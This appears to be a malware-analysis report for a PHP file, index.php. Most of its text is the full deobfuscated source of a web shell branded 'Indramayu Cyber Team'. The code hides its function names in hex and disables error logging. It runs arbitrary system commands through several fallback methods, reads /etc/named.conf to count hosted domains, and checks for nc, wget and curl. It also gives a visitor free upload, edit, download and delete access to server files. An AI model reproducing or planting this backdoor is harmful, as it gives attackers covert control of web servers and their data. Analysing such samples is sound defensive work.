PHP Malware Analysis

index.php

md5: f366743e61abfbcb2d8ba600a3f7f514

Jump to:

Screenshot


Attributes

Emails

Environment

Execution

Input

Title

URLs
  • https://1.bp.blogspot.com/-M0ZH5WcjeLk/YPHKrrDwwqI/AAAAAAAAALQ/UElzDOSvAwErnaFmd0hSxqxN6gCiC4-cwCLcBGAsYHQ/s320/images.jpeg (Deobfuscated, HTML, Original, Traces)
  • https://cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/css/bootstrap.min.css (Deobfuscated, HTML, Original)
  • https://cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/css/bootstrap.min.css" (HTML)
  • https://cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/js/bootstrap.bundle.min.js (Deobfuscated, HTML, Original)
  • https://cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/js/bootstrap.bundle.min.js" (HTML)
  • https://code.jquery.com/jquery-3.6.0.min.js (Deobfuscated, HTML, Original)
  • https://code.jquery.com/jquery-3.6.0.min.js" (HTML)
  • https://imcyber-team.blogspot.com/ (Deobfuscated, HTML, Original)
  • https://imcyber-team.blogspot.com/" (HTML)
  • https://pro.fontawesome.com/releases/v5.10.0/css/all.css (Deobfuscated, HTML, Original)
  • https://pro.fontawesome.com/releases/v5.10.0/css/all.css" (HTML)


Deobfuscated PHP code

<?php

$shellName = 'Indramayu Cyber Team';
$logo = 'https://1.bp.blogspot.com/-M0ZH5WcjeLk/YPHKrrDwwqI/AAAAAAAAALQ/UElzDOSvAwErnaFmd0hSxqxN6gCiC4-cwCLcBGAsYHQ/s320/images.jpeg';
$func = ["7068705f756e616d65", "70687076657273696f6e", "676574637764", "6368646972", "707265675f73706c6974", "61727261795f64696666", "69735f646972", "69735f66696c65", "69735f7772697461626c65", "69735f7265616461626c65", "66696c6573697a65", "636f7079", "66696c655f657869737473", "66696c655f7075745f636f6e74656e7473", "66696c655f6765745f636f6e74656e7473", "6d6b646972", "72656e616d65", "737472746f74696d65", "68746d6c7370656369616c6368617273", "64617465", "66696c656d74696d65", "7363616e646972", "73797374656d", "65786563", "7061737374687275", "7368656c6c5f65786563", "6f625f6765745f636f6e74656e7473", "6f625f656e645f636c65616e", "6469726e616d65", "6469736b5f746f74616c5f7370616365", "6469736b5f667265655f7370616365", "696e695f676574", "707265675f6d617463685f616c6c", "706f7369785f6765747077756964", "706f7369785f6765746772676964", "70617468696e666f", "66696c656f776e6572", "66696c6567726f7570", "66696c6574797065", "676574486f73744e616d65", "676574486f737442794e616d65", "737562737472", "737472737472", "696e695f736574", "66696c65", "7374725f7265706c616365", "6578706c6f6465", "6576616c", "6f625f7374617274", "66756e6374696f6e5f657869737473", "6572726f725f7265706f7274696e67", "7365745f74696d655f6c696d6974", "636c656172737461746361636865", "646174655f64656661756c745f74696d657a6f6e655f736574", "666c757368", "7374726c656e", "7472696d", "656d707479", "6973736574", "66696c657065726d73", "7374726c656e", "636f756e74", "726f756e64", "6d696d655f636f6e74656e745f74797065", "6765745f63757272656e745f75736572", "6765746d79756964", "6765746d79676964", "706f7369785f67657465756964", "706f7369785f67657465676964"];
for ($i = 0; $i < count($func); $i++) {
    $func[$i] = dehex($func[$i]);
}
session_start();
$func[50](0);
@$func[51](0);
@$func[52]();
@$func[43]('error_log', null);
@$func[43]('log_errors', 0);
@$func[43]('max_execution_time', 0);
@$func[43]('output_buffering', 0);
@$func[43]('display_errors', 0);
$func[53]("Asia/Jakarta");
if (isset($_GET['dir'])) {
    $dir = $_GET['dir'];
    $func[3]($dir);
} else {
    $dir = $func[2]();
}
$d0mains = @$func[44]("/etc/named.conf", false);
if (!$d0mains) {
    $dom = "<font class='text-danger'>Can't Read /etc/named.conf</font>";
} else {
    $count = 0;
    foreach ($d0mains as $d0main) {
        if (@$func[43]($d0main, "zone")) {
            $func[32]('#zone "(.*)"#', $d0main, $domains);
            $func[54]();
            if ($func[55]($func[56]($domains[1][0])) > 2) {
                $func[54]();
                $count++;
            }
        }
    }
    $dom = "<font class='text-success'>{$count} Domain</font>";
}
$dir = $func[45]("\\", "/", $dir);
$scdir = $func[46]("/", $dir);
$total = $func[29]($dir);
$free = $func[30]($dir);
$pers = (int) ($free / $total * 100);
$ds = @$func[31]("disable_functions");
$show_ds = !empty($ds) ? "<font class='text-danger'>{$ds}</font>" : "<font class='text-success'>All function is accessible</font>";
$cmd_uname = exe("uname -a");
$uname = $func[49]('php_uname') ? $func[41](@$func[0](), 0, 120) : ($func[55]($cmd_uname) > 0 ? $cmd_uname : '( php_uname ) Function Disabled !');
if (strtolower($func[41](PHP_OS, 0, 3)) == "win") {
    $sys = "win";
} else {
    $sys = "unix";
}
if (isset($_GET['do'])) {
    $do = $_GET['do'];
    if ($do == 'delete') {
        if ($func[12]($dir)) {
            if (deleter($dir)) {
                flash("File/Folder deleted successfully!", "Success", "success", "?dir=" . dirname($dir));
            } else {
                flash("File/Folder failed to delete!", "Failed", "danger");
            }
        } else {
            flash("File/Folder is doesn't exist!", "Failed", "warning");
        }
    } else {
        if ($do == 'download') {
            if ($func[12]($dir)) {
                header("Content-Type: application/octet-stream");
                header("Content-Transfer-Encoding: Binary");
                header("Content-Length: " . $func[10]($dir));
                header("Content-disposition: attachment; filename=\"" . basename($dir) . "\"");
            } else {
                flash("File is doesn't exist!", "Failed", "warning");
            }
        }
    }
} else {
    $do = 'filesman';
    $title = 'Files Manager';
    $icon = 'archive';
}
isset($_POST["foldername"]) ? $func[12]("{$dir}/{$_POST['foldername']}") ? flash("Folder name is exist!", "Failed", "warning") : ($func[15]("{$dir}/{$_POST['foldername']}") ? flash("Folder created successfully!", "Success", "success") : flash("Folder failed to create!", "Failed", "danger")) : null;
isset($_POST["filename"]) && isset($_POST['filecontent']) ? $func[12]("{$dir}/{$_POST['filename']}") ? flash("File name is exist!", "Failed", "warning") : ($func[13]("{$dir}/{$_POST['filename']}", $_POST['filecontent']) ? flash("File created successfully!", "Success", "success") : flash("File failed to create!", "Failed", "danger")) : null;
isset($_POST["newname"]) && isset($_POST['oldname']) ? $func[12]("{$dir}/{$_POST['newname']}") ? flash("File/Folder name is exist!", "Failed", "warning") : ($func[16]("{$dir}/{$_POST['oldname']}", $_POST['newname']) ? flash("File/Folder renamed successfully!", "Success", "success") : flash("File/Folder failed to rename!", "Failed", "danger")) : null;
isset($_POST["filename"]) && isset($_POST['content']) ? $func[13]("{$dir}/{$_POST['filename']}", $_POST['content']) ? flash("File saved successfully!", "Success", "success") : flash("File failed to save!", "Failed", "danger") : null;
if (isset($_FILES["uploadfile"])) {
    $n = $_FILES["uploadfile"]["name"];
    for ($i = 0; $i < count($n); $i++) {
        if ($func[11]($_FILES["uploadfile"]["tmp_name"][$i], $n[$i])) {
            flash("File uploaded successfully!", "Success", "success");
        } else {
            flash("File failed to upload!", "Failed", "danger");
        }
    }
}
if (@$func[31]('open_basedir')) {
    $basedir_data = @$func[31]('open_basedir');
    if ($func[55]($basedir_data) > 120) {
        $open_b = "<font class='text-success'>" . $func[41]($basedir_data, 0, 120) . "...</font>";
    } else {
        $open_b = '<font class="text-success">' . $basedir_data . '</font>';
    }
} else {
    $open_b = '<font class="text-warning">NONE</font>';
}
if (!$func[49]('posix_getegid')) {
    $user = $func[49]("get_current_user") ? @$func[64]() : "????";
    $uid = $func[49]("getmyuid") ? @$func[65]() : "????";
    $gid = $func[49]("getmygid") ? @$func[66]() : "????";
    $group = "?";
} else {
    $uid = $func[49]("posix_getpwuid") && $func[49]("posix_geteuid") ? @$func[33]($func[67]()) : ["name" => "????", "uid" => "????"];
    $gid = $func[49]("posix_getgrgid") && $func[49]("posix_getegid") ? @$func[34]($func[68]()) : ["name" => "????", "gid" => "????"];
    $user = $uid['name'];
    $uid = $uid['uid'];
    $group = $gid['name'];
    $gid = $gid['gid'];
}
if ($sys == 'unix') {
    if (!@$func[31]('safe_mode')) {
        if ($func[55](exe("id")) > 0) {
            $userful = ['gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzialfa2', 'nc', 'locate', 'suidperl'];
            $x = 0;
            foreach ($userful as $i) {
                if (which($i)) {
                    $x++;
                    $useful .= $i . ', ';
                }
            }
            if ($x == 0) {
                $useful = '--------';
            }
            $downloaders = ['wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror'];
            $x = 0;
            foreach ($downloaders as $i) {
                if (which($i)) {
                    $x++;
                    $downloader .= $i . ', ';
                }
            }
            if ($x == 0) {
                $downloader = '--------';
            }
        }
    }
}
function hex($str)
{
    global $func;
    $r = "";
    for ($i = 0; $i < $func[55]($str); $i++) {
        $r .= dechex(ord($str[$i]));
    }
    return $r;
}
function dehex($str)
{
    $r = "";
    $len = strlen($str) - 1;
    for ($i = 0; $i < $len; $i += 2) {
        $r .= chr(hexdec($str[$i] . $str[$i + 1]));
    }
    return $r;
}
function formatSize($bytes)
{
    $types = array('B', 'KB', 'MB', 'GB', 'TB');
    for ($i = 0; $bytes >= 1024 && $i < count($types) - 1; $bytes /= 1024, $i++) {
    }
    return round($bytes, 2) . " " . $types[$i];
}
function perms($file)
{
    global $func;
    $perms = fileperms($file);
    if (($perms & 0xc000) == 0xc000) {
        $info = 's';
    } elseif (($perms & 0xa000) == 0xa000) {
        $info = 'l';
    } elseif (($perms & 0x8000) == 0x8000) {
        $info = '-';
    } elseif (($perms & 0x6000) == 0x6000) {
        $info = 'b';
    } elseif (($perms & 0x4000) == 0x4000) {
        $info = 'd';
    } elseif (($perms & 0x2000) == 0x2000) {
        $info = 'c';
    } elseif (($perms & 0x1000) == 0x1000) {
        $info = 'p';
    } else {
        $info = 'u';
    }
    $info .= $perms & 0x100 ? 'r' : '-';
    $info .= $perms & 0x80 ? 'w' : '-';
    $info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
    $info .= $perms & 0x20 ? 'r' : '-';
    $info .= $perms & 0x10 ? 'w' : '-';
    $info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
    $info .= $perms & 0x4 ? 'r' : '-';
    $info .= $perms & 0x2 ? 'w' : '-';
    $info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
    return $func[41](sprintf('%o', $perms), -4) . ' >> ' . $info;
}
function exe($in)
{
    global $func;
    $out = '';
    try {
        if ($func[49]('exec')) {
            @$func[23]($in, $out);
            $out = @join("\n", $out);
        } elseif ($func[49]('passthru')) {
            $func[48]();
            @passthru($in);
            $out = $func[27]();
        } elseif ($func[49]('system')) {
            $func[48]();
            @system($in);
            $out = $func[27]();
        } elseif ($func[49]('shell_exec')) {
            $out = $func[25]($in);
        } elseif ($func[49]("popen") && $func[49]("pclose")) {
            if (is_resource($f = @popen($in, "r"))) {
                $out = "";
                while (!@feof($f)) {
                    $out .= fread($f, 1024);
                }
                pclose($f);
            }
        } elseif ($func[49]('proc_open')) {
            $pipes = [];
            $process = @proc_open($in . ' 2>&1', array(array("pipe", "w"), array("pipe", "w"), array("pipe", "w")), $pipes, null);
            $out = @stream_get_contents($pipes[1]);
        } elseif (class_exists('COM')) {
            $ws = new COM('WScript.shell');
            $exec = $ws->exec('cmd.exe /c ' . $in);
            $stdout = $exec->StdOut();
            $out = $stdout->ReadAll();
        }
    } catch (Exception $e) {
    }
    return $out;
}
function checkName($name)
{
    global $func;
    if ($func[55]($name) > 18) {
        return $func[41]($name, 0, 18) . "...";
    }
    return $name;
}
function checkPerm($dir, $perm)
{
    global $func;
    $perm = explode('>>', $perm);
    if ($func[8]($dir)) {
        return "<font class='text-success'>" . $perm[0] . "</font> >> <font class='text-success'>" . $perm[1] . "</font>";
    } elseif (!$func[9]($dir)) {
        return "<font class='text-danger'>" . $perm[0] . "</font> >> <font class='text-danger'>" . $perm[1] . "</font>";
    } else {
        return "<font class='text-secondary'>" . $perm[0] . "</font> >> <font class='text-secondary'>" . $perm[1] . "</font>";
    }
}
function getowner($item)
{
    global $func;
    if ($func[49]("posix_getpwuid")) {
        $downer = @$func[33](fileowner($item));
        $downer = $downer['name'];
    } else {
        $downer = fileowner($item);
    }
    if ($func[49]("posix_getgrgid")) {
        $dgrp = @$func[34](filegroup($item));
        $dgrp = $dgrp['name'];
    } else {
        $dgrp = filegroup($item);
    }
    return $downer . '/' . $dgrp;
}
function geticon($file)
{
    global $func;
    $ext = strtolower($func[35]($file, PATHINFO_EXTENSION));
    if ($ext == 'php' || $ext == 'html' || $ext == 'js' || $ext == 'css' || $ext == 'py' || $ext == 'perl' || $ext == 'sh') {
        return "file-code";
    } else {
        if ($ext == 'pdf') {
            return "file-pdf";
        } else {
            if ($ext == 'txt') {
                return "file-alt";
            } else {
                if ($ext == 'csv') {
                    return "file-csv";
                } else {
                    if ($ext == 'jpg' || $ext == 'png' || $ext == 'jpeg' || $ext == 'gif') {
                        return "file-image";
                    } else {
                        if ($ext == 'mp4' || $ext == '3gp' || $ext == 'mkv') {
                            return "file-video";
                        } else {
                            if ($ext == 'docx' || $ext == 'doc' || $ext == 'docm') {
                                return "file-word";
                            } else {
                                if ($ext == 'ppt' || $ext == 'pptx') {
                                    return "file-powerpoint";
                                } else {
                                    if ($ext == 'xlsx' || $ext == 'xlsb' || $ext == 'xlsm' || $ext == 'xltx' || $ext == 'xltm') {
                                        return "file-excel";
                                    } else {
                                        if ($ext == 'mp3' || $ext == 'wav') {
                                            return "file-audio";
                                        } else {
                                            if ($ext == 'sql' || $ext == 'db') {
                                                return "database";
                                            } else {
                                                if ($ext == 'zip' || $ext == 'tar' || $ext == 'gz' || $ext == 'tar.gz' || $ext == '7z' || $ext == 'bz2') {
                                                    return "file-archive";
                                                } else {
                                                    return "file";
                                                }
                                            }
                                        }
                                    }
                                }
                            }
                        }
                    }
                }
            }
        }
    }
}
function which($p)
{
    global $func;
    $path = exe('which ' . $p);
    if (!empty($path)) {
        return $func[55]($path);
    }
    return false;
}
function flash($message, $status, $class, $redirect = false)
{
    if (!empty($_SESSION["message"])) {
        unset($_SESSION["message"]);
    }
    if (!empty($_SESSION["class"])) {
        unset($_SESSION["class"]);
    }
    if (!empty($_SESSION["status"])) {
        unset($_SESSION["status"]);
    }
    $_SESSION["message"] = $message;
    $_SESSION["class"] = $class;
    $_SESSION["status"] = $status;
    if ($redirect) {
        header('Location: ' . $redirect);
        exit;
    }
    return true;
}
function clear()
{
    if (!empty($_SESSION["message"])) {
        unset($_SESSION["message"]);
    }
    if (!empty($_SESSION["class"])) {
        unset($_SESSION["class"]);
    }
    if (!empty($_SESSION["status"])) {
        unset($_SESSION["status"]);
    }
    return true;
}
function deleter($d)
{
    global $func;
    if (trim($func[35]($d, PATHINFO_BASENAME), '.') === '') {
        return false;
    }
    if ($func[6]($d)) {
        array_map("deleter", glob($d . DIRECTORY_SEPARATOR . '{,.}*', "GLOB_N_SOWT"));
        rmdir($d);
        return true;
    } else {
        unlink($d);
        return true;
    }
    return false;
}
$scandir = $func[21]($dir);
?>
<!doctype html>
<html lang="en">
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-+0n0xVW2eSR5OomGNYDnhzAbDsOXxcvSN1TPprVMTNDbiYZCxYbOOl7+AMvyTG2x" crossorigin="anonymous">
	<link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous"/>
	<title><?php 
echo $shellName;
?></title>
</head>
<body>
	<div class="container-lg">
		
		<nav class="navbar navbar-light bg-light">
			<div class="container-fluid">
				<a class="navbar-brand" href="?">
					<img src="<?php 
echo $logo;
?>" alt="logo" width="30" height="24" class="d-inline-block align-text-top">
					<?php 
echo $shellName;
?>
				</a>
			</div>
		</nav>
		
		<?php 
if (isset($_SESSION['message'])) {
    ?>
		<div class="alert alert-<?php 
    echo $_SESSION['class'];
    ?> alert-dismissible fade show my-3" role="alert">
			<strong><?php 
    echo $_SESSION['status'];
    ?>!</strong> <?php 
    echo $_SESSION['message'];
    ?>
			<button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>
		</div>
		<?php 
}
clear();
?>

		<div id="tool">
			<div class="d-flex justify-content-center flex-wrap my-3">
				<a href="?" class="m-1 btn btn-outline-dark btn-sm"><i class="fa fa-home"></i> Home</a>
				<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#upload" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-upload"></i> Upload</a>
				<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#newfile" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-file-plus"></i> New File</a>
				<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#newfolder" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-folder-plus"></i> New Folder</a>
			</div>
			
			<div class="row">
				<div class="col-md-12">
					<div class="collapse" id="upload" data-bs-parent="#tool">
						<div class="card card-body border-dark mb-3">
							<div class="row">
								 <div class="col-md-6">
									<form action="" method="post" enctype="multipart/form-data">
										<div class="input-group">
											<input type="file" class="form-control" name="uploadfile[]" id="inputGroupFile04" aria-describedby="inputGroupFileAddon04" aria-label="Upload">
											<button class="btn btn-outline-dark" type="submit" id="inputGroupFileAddon04">Upload</button>
										</div>
									</form>
								 </div>
							</div>
						</div>
					</div>
				</div>
				<div class="col-md-12">
					<div class="collapse" id="newfile" data-bs-parent="#tool">
						<div class="card card-body border-dark mb-3">
							<div class="row">
								<div class="col-md-6">
									<form action="" method="post">
										<div class="mb-3">
											<label class="form-label">File Name</label>
											<input type="text" class="form-control" name="filename" placeholder="./sToryAn9el.txt">
										</div>
										<div class="mb-3">
											<label class="form-label">File Content</label>
											<textarea class="form-control" rows="5" name="filecontent"></textarea>
										</div>
										<button type="submit" class="btn btn-outline-dark">Create</button>
									</form>
								</div>
							</div>
						</div>
					</div>
				</div>
				<div class="col-md-12">
					<div class="collapse" id="newfolder" data-bs-parent="#tool">
						<div class="card card-body border-dark mb-3">
							<div class="row">
								<div class="col-md-6">
									<form action="" method="post">
										<div class="mb-3">
											<label class="form-label">Folder Name</label>
											<input type="text" class="form-control" name="foldername" placeholder="./sToryAn9el">
										</div>
										<button type="submit" class="btn btn-outline-dark">Create</button>
									</form>
								</div>
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>

		<div class="row">
			<div class="col-md-12">
				<div class="card border-dark">
					<div class="card-body">
						<h5><i class="fa fa-server"></i> Server Information </h5>
						<div class="table-responsive">
							<table class="table table-hover text-nowrap">
								<tr>
									<td>Operating System</td>
									<td> : <?php 
echo $uname;
?></td>
								</tr>
								<tr>
									<td>User / Group</td>
									<td> : <?php 
echo $uid;
?>[<?php 
echo $user;
?>] / <?php 
echo $gid;
?>[<?php 
echo $group;
?>]</td>
								</tr>
								<tr>
									<td>PHP Version</td>
									<td> : <?php 
echo $func[1]();
?></td>
								</tr>
								<tr>
									<td>IP Server</td>
									<td> : <?php 
echo !@$_SERVER["SERVER_ADDR"] ? $func[49]("gethostbyname") ? @gethostbyname($_SERVER['SERVER_NAME']) : '????' : @$_SERVER["SERVER_ADDR"];
?></td>
								</tr>
								<tr>
									<td>Storage</td>
									<td class="d-flex">: Total = <?php 
echo formatSize($total);
?>, Free = <?php 
echo formatSize($free);
?> [<?php 
echo $pers;
?>%]</td>
								</tr>
								<tr>
									<td>Domains</td>
									<td>: <?php 
echo $dom;
?></td>
								</tr>
								<tr>
									<td>Software</td>
									<td>: <?php 
echo $_SERVER['SERVER_SOFTWARE'];
?></td>
								</tr>
								<tr>
									<td>Disable Functions</td>
									<td>: <?php 
echo $show_ds;
?></td>
								</tr>
								<tr>
									<td>Useful Functions</td>
									<td>: <?php 
echo rtrim($useful, ', ');
?></td>
								</tr>
								<tr>
									<td>Downloader</td>
									<td>: <?php 
echo rtrim($downloader, ', ');
?></td>
								</tr>
								<tr>
									<td colspan="2">CURL : <?php 
echo $func[49]('curl_version') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>';
?> | SSH2 : <?php 
echo $func[49]('ssh2_connect') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>';
?> | Magic Quotes : <?php 
echo $func[49]('get_magic_quotes_gpc') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>';
?> | MySQL : <?php 
echo $func[49]('mysql_get_client_info') || class_exists('mysqli') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>';
?> | MSSQL : <?php 
echo $func[49]('mssql_connect') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>';
?> | PostgreSQL : <?php 
echo $func[49]('pg_connect') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>';
?> | Oracle : <?php 
echo $func[49]('oci_connect') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>';
?></td>
								</tr>
								<tr>
									<td colspan="2">Safe Mode : <?php 
echo @$func[31]('safe_mode') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>';
?> | Open Basedir : <?php 
echo $open_b;
?> | Safe Mode Exec Dir : <?php 
echo @$func[31]('safe_mode_exec_dir') ? '<font class="text-success">' . @$func[31]('safe_mode_exec_dir') . '</font>' : '<font class="text-warning">NONE</font>';
?> | Safe Mode Include Dir : <?php 
echo @$func[31]('safe_mode_include_dir') ? '<font class="text-success">' . @$func[31]('safe_mode_include_dir') . '</font>' : '<font class="text-warning">NONE</font>';
?></td>
								</tr>
							</table>
						</div>
					</div>
				</div>
			</div>
			<div class="col-md-12 my-3">
				<div class="card border-dark">
					<div class="card-body">
						<h5><i class="fa fa-wave-square"></i> Path </h5>
						<nav aria-label="breadcrumb" style="--bs-breadcrumb-divider: '>';">
							<ol class="breadcrumb">
								<?php 
$numDir = count($scdir);
foreach ($scdir as $id => $pat) {
    if ($pat == '' && $id == 0) {
        echo "<li class=\"breadcrumb-item\"><a class=\"text-decoration-none text-dark\" href=\"?dir=/\">/</a></li>";
        continue;
    }
    if ($pat == '') {
        continue;
    }
    if ($id + 1 == $numDir) {
        echo '<li class="breadcrumb-item active" aria-current="page">' . $pat . '</li>';
    } else {
        echo "<li class=\"breadcrumb-item\"><a class=\"text-decoration-none text-dark\" href=\"?dir=";
        for ($i = 0; $i <= $id; $i++) {
            echo "{$scdir[$i]}";
            if ($i != $id) {
                echo "/";
            }
        }
        echo '">' . $pat . '</a></li>';
    }
}
?>
							</ol>
						</nav>
						[ <?php 
echo checkPerm($dir, perms($dir));
?> ]
					</div>
				</div>
			</div>
			<div class="col-md-12" id="main">
				<div class="card border-dark overflow-auto">
					<div class="card-body">
						<h5><i class="fa fa-<?php 
echo $icon;
?>"></i> <?php 
echo $title;
?></h5>
						<?php 
if ($do == 'view') {
    ?>
							<h1>Anjing</h1>
						<?php 
} else {
    ?>
							<?php 
    if ($func[9]($dir)) {
        ?>
								<div class="table-responsive">
									<table class="table table-hover text-nowrap">
										<thead>
											<tr>
												<th>Name</th>
												<th>Type</th>
												<th>Size</th>
												<th>Last Modified</th>
												<th>Owner/Group</th>
												<th>Permission</th>
												<th>Action</th>
											</tr>
										</thead>
										<tbody>
											<?php 
        foreach ($scandir as $item) {
            if (!$func[6]($dir . '/' . $item)) {
                continue;
            }
            ?>
												<tr>
													<td>
														<?php 
            if ($item === '..') {
                ?>
														<a href="?dir=<?php 
                echo $func[28]($dir);
                ?>" class="text-decoration-none text-dark"><i class="fa fa-folder-open"></i> <?php 
                echo $item;
                ?></a>
														<?php 
            } elseif ($item === '.') {
                ?>
														<a href="?dir=<?php 
                echo $dir;
                ?>" class="text-decoration-none text-dark"><i class="fa fa-folder-open"></i> <?php 
                echo $item;
                ?></a>
														<?php 
            } else {
                ?>
														<a href="?dir=<?php 
                echo $dir . '/' . $item;
                ?>" class="text-decoration-none text-dark"><i class="fa fa-folder"></i> <?php 
                echo checkName($item);
                ?></a>
														<?php 
            }
            ?>
													</td>
													<td><?php 
            echo $func[38]($item);
            ?></td>
													<td class="align-middle">--</td>
													<td><?php 
            echo $func[19]("Y-m-d h:i:s", $func[20]($item));
            ?></td>
													<td><?php 
            echo getowner($item);
            ?></td>
													<td><?php 
            echo checkPerm($dir . '/' . $item, perms($dir . '/' . $item));
            ?></td>
													<td>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" <?php 
            echo $item === ".." || $item === "." ? '' : 'data-bs-toggle="modal" data-bs-target="#renameModal" data-bs-name="' . $item . '"';
            ?>><i class="fa fa-edit"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" <?php 
            echo $item === ".." || $item === "." ? '' : 'data-bs-toggle="modal" data-bs-target="#deleteModal" data-bs-file="' . $dir . '/' . $item . '"';
            ?>><i class="fa fa-trash-alt"></i></button>
													</td>
												</tr>
											<?php 
        }
        ?>
											<?php 
        foreach ($scandir as $item) {
            if (!$func[7]($dir . '/' . $item)) {
                continue;
            }
            ?>
												<tr>
													<td><a data-bs-toggle="modal" href="#viewModal" role="button" data-bs-name="<?php 
            echo $item;
            ?>" data-bs-content="<?php 
            echo $func[18](@$func[14]($item));
            ?>" class="text-dark text-decoration-none"><i class="fa fa-<?php 
            echo geticon($item);
            ?>"></i> <?php 
            echo checkName($item);
            ?></a></td>
													<td><?php 
            echo checkName($func[49]('mime_content_type') ? $func[63]($item) : $func[38]($item));
            ?></td>
													<td><?php 
            echo formatSize($func[10]($item));
            ?></td>
													<td><?php 
            echo $func[19]("Y-m-d h:i:s", $func[20]($item));
            ?></td>
													<td><?php 
            echo getowner($item);
            ?></td>
													<td><?php 
            echo checkPerm($dir . '/' . $item, perms($dir . '/' . $item));
            ?></td>
													<td>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-toggle="modal" data-bs-target="#renameModal" data-bs-name="<?php 
            echo $item;
            ?>"><i class="fa fa-edit"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-toggle="modal" data-bs-target="#viewModal" data-bs-name="<?php 
            echo $item;
            ?>" data-bs-content="<?php 
            echo $func[18](@$func[14]($item));
            ?>"><i class="fa fa-file-signature"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-toggle="modal" data-bs-target="#downloadModal" data-bs-file="<?php 
            echo $dir . '/' . $item;
            ?>"><i class="fa fa-download"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-toggle="modal" data-bs-target="#deleteModal" data-bs-file="<?php 
            echo $dir . '/' . $item;
            ?>"><i class="fa fa-trash-alt"></i></button>
													</td>
												</tr>
											<?php 
        }
        ?>
										</tbody>
									</table>
								</div>
							<?php 
    } else {
        ?>
								<font class="text-danger">Can't read this directory!</font>
							<?php 
    }
    ?>
						<?php 
}
?>
					</div>
				</div>
			</div>
			<div class="col-md-12 my-3">
				<div class="card border-dark">
					<div class="card-body">
						Copyright © <a href="https://imcyber-team.blogspot.com/"><font size="1"><b>INDRAMAYU CYBER TEAM</b></font></a> <span class="float-end">Coded by <span class="text-muted">./sTory An9el </span></span>
					</div>
				</div>
			</div>
		</div>
	</div>
	
	<div class="modal fade" id="renameModal" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1" aria-labelledby="renameModalLabel" aria-hidden="true">
	  <div class="modal-dialog modal-dialog-centered">
	    <div class="modal-content">
	      <div class="modal-header">
	        <h5 class="modal-title" id="renameModalLabel">Rename</h5>
	        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
	      </div>
	      <form method="post" id="rename-form">
		      <div class="modal-body">
		          <div class="mb-3">
		            <label for="newname" class="col-form-label">New Name:</label>
		            <input type="text" class="form-control" name="newname" id="newname">
		          </div>
		      </div>
		      <div class="modal-footer">
		        <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
		        <button type="submit" class="btn btn-primary">Rename</button>
		      </div>
        </form>
	    </div>
	  </div>
	</div>
	
	<div class="modal fade" id="deleteModal" aria-hidden="true" aria-labelledby="deleteModalToggleLabel2" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1">
	  <div class="modal-dialog modal-dialog-centered">
	    <div class="modal-content">
	      <div class="modal-header">
	        <h5 class="modal-title" id="exampleModalToggleLabel2">Delete</h5>
	        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
	      </div>
	      <div class="modal-body">
	        Are you sure want to delete this?
	      </div>
	      <div class="modal-footer">
	        <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
	        <a href="" class="btn btn-danger" id="delete-confirm">Delete</a>
	      </div>
	      
	    </div>
	  </div>
	</div>
	
	<div class="modal fade" id="downloadModal" aria-hidden="true" aria-labelledby="deleteModalToggleLabel2" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1">
	  <div class="modal-dialog modal-dialog-centered">
	    <div class="modal-content">
	      <div class="modal-header">
	        <h5 class="modal-title" id="exampleModalToggleLabel2">Download</h5>
	        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
	      </div>
	      <div class="modal-body">
	        Are you sure want to download this?
	      </div>
	      <div class="modal-footer">
	        <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
	        <a href="" class="btn btn-danger" id="download-confirm">Download</a>
	      </div>
	      
	    </div>
	  </div>
	</div>
	
